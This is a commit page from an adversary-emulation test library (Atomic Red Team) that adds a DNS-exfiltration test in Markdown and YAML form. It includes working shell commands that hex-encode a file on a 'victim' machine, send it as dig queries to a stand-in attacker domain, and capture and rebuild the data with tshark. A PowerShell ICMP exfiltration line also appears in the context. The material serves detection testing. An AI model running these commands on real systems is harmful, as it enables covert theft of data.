security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

T1048 exfiltration over dns (#831)

Browse Source 
* added-dns-exfiltration

Exfiltration over DNS

* Update T1048.md

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Sharath Unni
2020-03-10 19:08:02 -04:00
committed by GitHub
parent 2f778f359e
commit 5b61194689
2 changed files with 75 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1048/T1048.md
+38
View File
@@ -23,6 +23,7 @@ Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016)
- [Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)
- [Atomic Test #4 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)
<br/>
@@ -137,4 +138,41 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
<br/>
## Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS
Exfiltration of specified file using DNS. A domain name (example.com) and a hosting server is required. In your domain control panel, configure the below DNS settings:
a) Create an A record ns1.example.com that points to the server IP.
b) Set the NS record (ns2.example.com) to point to the server (ns1.example.com).
**Supported Platforms:** Linux
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | target DNS domain | url | ns2.example.com|
| input_file | Path to file to be exfiltrated. | Path | ./example.txt|
| output_file | Filename of the data exfiltrated | string | received_data.txt|
#### Adversary machine: Run with `sh`!
1. On the adversary machine run the below command.
tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
#### Attack Commands: Run with `sh`!
2. On the victim machine run the below commands.
xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
#### Recover data by running the below commands. Run with `sh`!
3. Once the data is received, use the below command to recover the data.
cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
<br/>
atomics/T1048/T1048.yaml
+37
View File
@@ -110,3 +110,40 @@ atomic_tests:
elevation_required: false
command: |
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
- name: Exfiltration Over Alternative Protocol - DNS
description: |
Exfiltration of specified file over DNS protocol.
supported_platforms:
- linux
input_arguments:
domain:
description: target DNS domain
type: url
default: ns2.example.com
input_file:
description: Path to file to be exfiltrated.
type: Path
default: ./example.txt
output_file:
description: Filename of the data exfiltrated.
type: String
default: received_data.txt
executor:
name: manual
steps: |
1. On the adversary machine run the below command.
tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
2. On the victim machine run the below commands.
xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
3. Once the data is received, use the below command to recover the data.
cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r